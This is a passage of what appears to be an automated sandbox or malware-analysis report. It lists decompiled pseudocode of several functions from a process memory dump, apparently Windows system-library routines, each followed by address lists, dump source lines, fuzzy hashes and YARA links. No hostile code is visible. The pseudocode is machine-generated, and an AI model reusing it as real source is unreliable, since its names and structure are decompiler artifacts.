					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E04D9BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04CF7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E04D8FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E04CEFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E04D9A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                            0x04d9ea55
                                                                                            0x04d9ea66
                                                                                            0x04d9ea68
                                                                                            0x04d9ea6c
                                                                                            0x04d9ea6f
                                                                                            0x04d9ea72
                                                                                            0x04d9ea75
                                                                                            0x04d9ea7a
                                                                                            0x04d9ea7a
                                                                                            0x04d9ea7e
                                                                                            0x04d9ea80
                                                                                            0x04d9ea85
                                                                                            0x04d9ea8b
                                                                                            0x04d9eab5
                                                                                            0x04d9eabc
                                                                                            0x04d9eabf
                                                                                            0x04d9eabf
                                                                                            0x04d9eaca
                                                                                            0x04d9eace
                                                                                            0x04d9ead0
                                                                                            0x04d9eae4
                                                                                            0x04d9eaeb
                                                                                            0x04d9eaf0
                                                                                            0x04d9eaf5
                                                                                            0x04d9eb09
                                                                                            0x04d9eb0d
                                                                                            0x04d9eb1d
                                                                                            0x04d9eb2d
                                                                                            0x04d9eb38
                                                                                            0x04d9eb3d
                                                                                            0x04d9eb41
                                                                                            0x04d9eb4a
                                                                                            0x04d9eb60
                                                                                            0x04d9eb4c
                                                                                            0x04d9eb52
                                                                                            0x04d9eb59
                                                                                            0x04d9eb59
                                                                                            0x04d9eb68
                                                                                            0x04d9eb71
                                                                                            0x04d9eb71
                                                                                            0x04d9ea8d
                                                                                            0x04d9ea8f
                                                                                            0x04d9ea92
                                                                                            0x04d9ea97
                                                                                            0x04d9ea97
                                                                                            0x04d9ea9b
                                                                                            0x04d9ea9c
                                                                                            0x04d9ea9e
                                                                                            0x04d9eaa6
                                                                                            0x04d9eaa6
                                                                                            0x04d9eb7e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                            • Instruction ID: 5e50b51f9106b353ebba3733b9e49027e65445f7a30c27f7fc5a44188e67059f
                                                                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                            • Instruction Fuzzy Hash: 84319072604705ABDB29DF24C880A6BB7EAFBC0614F04492EE55687684EB35FC05CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D569A6, Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E04D569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4dcd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04CE6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04D56BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04D19980() >= 0) {
							E04CF2280(_t56, 0x4dc8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4dc8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4dc8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04CDB6F0(0x4cbc338, 0x4cbc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04D19520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04D195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04CEFFB0(_t68, _t77, 0x4dc8778);
				}
				_pop(_t78);
				return E04D1B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                            0x04d569b5
                                                                                            0x04d569be
                                                                                            0x04d569c3
                                                                                            0x04d569c9
                                                                                            0x04d569cc
                                                                                            0x04d569d1
                                                                                            0x04d569d3
                                                                                            0x04d569de
                                                                                            0x04d569e1
                                                                                            0x04d569ea
                                                                                            0x04d569f6
                                                                                            0x04d569fe
                                                                                            0x04d56a13
                                                                                            0x04d56a14
                                                                                            0x04d56a15
                                                                                            0x04d56a16
                                                                                            0x04d56a1e
                                                                                            0x04d56a26
                                                                                            0x04d56a31
                                                                                            0x04d56a36
                                                                                            0x04d56a37
                                                                                            0x04d56a40
                                                                                            0x04d56a49
                                                                                            0x04d56a4a
                                                                                            0x04d56a53
                                                                                            0x04d56a59
                                                                                            0x04d56a5d
                                                                                            0x04d56a5e
                                                                                            0x04d56a64
                                                                                            0x04d56a67
                                                                                            0x04d56a6a
                                                                                            0x04d56a6d
                                                                                            0x04d56a70
                                                                                            0x04d56a77
                                                                                            0x04d56a7d
                                                                                            0x04d56a86
                                                                                            0x04d56a89
                                                                                            0x04d56a9c
                                                                                            0x04d56a9f
                                                                                            0x04d56aa2
                                                                                            0x04d56aa5
                                                                                            0x04d56aaf
                                                                                            0x04d56ab1
                                                                                            0x04d56ab8
                                                                                            0x04d56ab9
                                                                                            0x04d56abb
                                                                                            0x04d56abe
                                                                                            0x04d56ac5
                                                                                            0x04d56ac5
                                                                                            0x04d56aaf
                                                                                            0x04d56a40
                                                                                            0x04d56a26
                                                                                            0x04d569fe
                                                                                            0x04d56ace
                                                                                            0x04d56ad0
                                                                                            0x04d56ad3
                                                                                            0x04d56ad8
                                                                                            0x04d56adf
                                                                                            0x04d56adf
                                                                                            0x04d56ae8
                                                                                            0x04d56aef
                                                                                            0x04d56aef
                                                                                            0x04d56af9
                                                                                            0x04d56b06

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a489f93ef6123773795a95401c78812497ea0e93fdcb7581e6afeb2f5b8263c
                                                                                            • Instruction ID: f84a3cf4739e647f9371fec4813349b963f95bd2aea055de97917b0cb42f44b7
                                                                                            • Opcode Fuzzy Hash: 4a489f93ef6123773795a95401c78812497ea0e93fdcb7581e6afeb2f5b8263c
                                                                                            • Instruction Fuzzy Hash: C7416DB1E00209AFEB14DFA5D940BFEBBF5FF48714F14812AE918A7250DB74A905CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD5210, Relevance: .1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E04CD5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04CD52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04D195D0();
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04CEEB70(_t54, 0x4dc79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04D195D0();
								L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04CEEB70(_t54, 0x4dc79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04D1F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04CEEB70(_t54, 0x4dc79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04D195D0();
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                            0x04cd5220
                                                                                            0x04cd5224
                                                                                            0x04d30d13
                                                                                            0x04d30d16
                                                                                            0x04d30d19
                                                                                            0x04cd522a
                                                                                            0x04cd522a
                                                                                            0x04cd522d
                                                                                            0x04cd522d
                                                                                            0x04cd5231
                                                                                            0x04cd5235
                                                                                            0x04cd5239
                                                                                            0x04d30d5c
                                                                                            0x04d30d62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d30d6a
                                                                                            0x04d30d7b
                                                                                            0x04d30d7f
                                                                                            0x04d30d81
                                                                                            0x04d30d84
                                                                                            0x04d30d95
                                                                                            0x04d30d95
                                                                                            0x04d30d6c
                                                                                            0x04d30d71
                                                                                            0x04d30d71
                                                                                            0x04d30d9a
                                                                                            0x00000000
                                                                                            0x04cd524a
                                                                                            0x04cd524a
                                                                                            0x04cd5250
                                                                                            0x04d30d24
                                                                                            0x04d30d35
                                                                                            0x04d30d39
                                                                                            0x04d30d3b
                                                                                            0x04d30d3e
                                                                                            0x04d30d50
                                                                                            0x04d30d50
                                                                                            0x04d30d26
                                                                                            0x04d30d2b
                                                                                            0x04d30d2b
                                                                                            0x00000000
                                                                                            0x04d30d55
                                                                                            0x04cd5256
                                                                                            0x04cd525b
                                                                                            0x04cd5265
                                                                                            0x04d30da7
                                                                                            0x04cd526b
                                                                                            0x04cd526e
                                                                                            0x04cd5272
                                                                                            0x04d30db1
                                                                                            0x04d30db4
                                                                                            0x04d30dc5
                                                                                            0x04d30dc5
                                                                                            0x04cd5272
                                                                                            0x04cd5278
                                                                                            0x04cd527e
                                                                                            0x04cd528a
                                                                                            0x04cd528c
                                                                                            0x04cd528d
                                                                                            0x00000000
                                                                                            0x04cd5280
                                                                                            0x04cd5282
                                                                                            0x04cd5288
                                                                                            0x04cd529f
                                                                                            0x04cd5292
                                                                                            0x00000000
                                                                                            0x04cd5292
                                                                                            0x00000000
                                                                                            0x04cd5288
                                                                                            0x04cd527e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b45132e68d17b28955e52ccc8b484f7d322b42cb7992da091f6435aa15b01e74
                                                                                            • Instruction ID: 8187ad85a052842f2a4d0130738026514953857707a2f6c67932e173cec5f067
                                                                                            • Opcode Fuzzy Hash: b45132e68d17b28955e52ccc8b484f7d322b42cb7992da091f6435aa15b01e74
                                                                                            • Instruction Fuzzy Hash: EC312431651A01EBD722AF29DC80B7677E6FF00765F11461AE9160B9A4EB70F804DA90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D13D43, Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D13D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04CE7B60(0, _t61, 0x4cb11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04CE7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0x0
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04CF4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                            0x04d13d4c
                                                                                            0x04d13d50
                                                                                            0x04d13d55
                                                                                            0x04d13d5e
                                                                                            0x04d4e79a
                                                                                            0x00000000
                                                                                            0x04d4e79a
                                                                                            0x04d13d68
                                                                                            0x04d4e789
                                                                                            0x04d13d9d
                                                                                            0x04d13da3
                                                                                            0x04d13daf
                                                                                            0x04d13db5
                                                                                            0x04d13dbc
                                                                                            0x04d13dc4
                                                                                            0x04d13dc9
                                                                                            0x04d13dce
                                                                                            0x04d4e7ae
                                                                                            0x04d4e7ae
                                                                                            0x04d13dd9
                                                                                            0x04d13dde
                                                                                            0x04d13de2
                                                                                            0x04d13de7
                                                                                            0x04d13e0d
                                                                                            0x04d13e13
                                                                                            0x04d13e16
                                                                                            0x04d13e1e
                                                                                            0x04d13e25
                                                                                            0x04d13e28
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d13e2a
                                                                                            0x04d13e2f
                                                                                            0x04d13e37
                                                                                            0x04d13e37
                                                                                            0x00000000
                                                                                            0x04d13e37
                                                                                            0x04d13e31
                                                                                            0x00000000
                                                                                            0x04d13e31
                                                                                            0x04d13e20
                                                                                            0x04d13e20
                                                                                            0x04d13e35
                                                                                            0x00000000
                                                                                            0x04d13de9
                                                                                            0x04d13de9
                                                                                            0x04d13de9
                                                                                            0x04d13dee
                                                                                            0x04d13dfd
                                                                                            0x04d13dff
                                                                                            0x04d13e02
                                                                                            0x04d13e05
                                                                                            0x04d13e05
                                                                                            0x00000000
                                                                                            0x04d13df0
                                                                                            0x04d13de7
                                                                                            0x04d4e78f
                                                                                            0x04d4e794
                                                                                            0x04d13d79
                                                                                            0x04d13d84
                                                                                            0x04d13d89
                                                                                            0x04d13d8e
                                                                                            0x00000000
                                                                                            0x04d4e7a4
                                                                                            0x04d13d96
                                                                                            0x04d13d9a
                                                                                            0x00000000
                                                                                            0x04d13d9a
                                                                                            0x00000000
                                                                                            0x04d4e794
                                                                                            0x04d13d6e
                                                                                            0x04d13d73
                                                                                            0x00000000
                                                                                            0x04d4e7b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 543015265f15a7b29eeb6b119c48a4bd283f568723fdbdbdec5a7f65b4ec47cc
                                                                                            • Instruction ID: e140d4a74b4c8038c4e8e5e84b420df5072a42fd2528b41091da8ab15c279669
                                                                                            • Opcode Fuzzy Hash: 543015265f15a7b29eeb6b119c48a4bd283f568723fdbdbdec5a7f65b4ec47cc
                                                                                            • Instruction Fuzzy Hash: 0C31B231B01614EBE7288F29E881A7BBBE5FF95710B05806AEC85CB360F730E841D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0A61C, Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E04D0A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4db0220);
				E04D2D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4dc7b9c; // 0x0
				_t55 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04D2D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4dc7b10 =  *0x4dc7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4dc536c; // 0xd128e0
					if( *_t51 != 0x4dc5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4dc5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4dc536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04D0A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                            0x04d0a61c
                                                                                            0x04d0a61e
                                                                                            0x04d0a623
                                                                                            0x04d0a628
                                                                                            0x04d0a62b
                                                                                            0x04d0a62d
                                                                                            0x04d0a648
                                                                                            0x04d0a64a
                                                                                            0x04d0a64f
                                                                                            0x04d49b44
                                                                                            0x04d0a6ec
                                                                                            0x04d0a6f1
                                                                                            0x04d0a6f1
                                                                                            0x04d0a655
                                                                                            0x04d0a657
                                                                                            0x04d0a65a
                                                                                            0x04d0a65d
                                                                                            0x04d0a662
                                                                                            0x04d0a663
                                                                                            0x04d0a667
                                                                                            0x04d0a668
                                                                                            0x04d0a66d
                                                                                            0x04d0a706
                                                                                            0x04d0a706
                                                                                            0x04d49bda
                                                                                            0x04d49be6
                                                                                            0x04d49beb
                                                                                            0x00000000
                                                                                            0x04d49beb
                                                                                            0x04d0a679
                                                                                            0x04d49b7a
                                                                                            0x00000000
                                                                                            0x04d49b7a
                                                                                            0x04d0a683
                                                                                            0x04d0a6f4
                                                                                            0x04d0a6f7
                                                                                            0x04d0a6f9
                                                                                            0x04d0a6fd
                                                                                            0x04d0a6a0
                                                                                            0x04d0a6a0
                                                                                            0x04d0a6ad
                                                                                            0x04d0a6af
                                                                                            0x04d0a6b4
                                                                                            0x04d49ba7
                                                                                            0x04d49bac
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d49bc6
                                                                                            0x04d49bce
                                                                                            0x04d49bd1
                                                                                            0x04d49bd3
                                                                                            0x04d49bd3
                                                                                            0x00000000
                                                                                            0x04d49bd1
                                                                                            0x04d0a6bd
                                                                                            0x04d0a6c3
                                                                                            0x04d0a6c6
                                                                                            0x04d0a6d2
                                                                                            0x04d0a701
                                                                                            0x04d0a704
                                                                                            0x00000000
                                                                                            0x04d0a704
                                                                                            0x04d0a6d4
                                                                                            0x04d0a6d6
                                                                                            0x04d0a6d9
                                                                                            0x04d0a6db
                                                                                            0x04d0a6e1
                                                                                            0x04d0a6e6
                                                                                            0x04d0a6e8
                                                                                            0x04d0a6e8
                                                                                            0x04d0a6ea
                                                                                            0x00000000
                                                                                            0x04d0a6ea
                                                                                            0x04d0a688
                                                                                            0x04d0a692
                                                                                            0x04d0a694
                                                                                            0x04d0a699
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0a69d
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff8d782af33eba7f3e97ae73538b384b6e5333048a10f2edfe56d5988ca8dd9d
                                                                                            • Instruction ID: 431c5541d541b3dbfdedd2a0cab532cc11306639619686c7d64d9c6206f6e3d0
                                                                                            • Opcode Fuzzy Hash: ff8d782af33eba7f3e97ae73538b384b6e5333048a10f2edfe56d5988ca8dd9d
                                                                                            • Instruction Fuzzy Hash: B34128B5A00216DFDB15CF69D4A0B9AB7F2FB99304F15C1A9E804AB380D774B901CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D57016, Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04D57016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4dcd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04D56B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04D56B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04CF7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04D19AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04D1B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04CF4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                            0x04d57016
                                                                                            0x04d5701e
                                                                                            0x04d5702b
                                                                                            0x04d57033
                                                                                            0x04d57037
                                                                                            0x04d5703c
                                                                                            0x04d5703e
                                                                                            0x04d57041
                                                                                            0x04d57045
                                                                                            0x04d5704a
                                                                                            0x04d57050
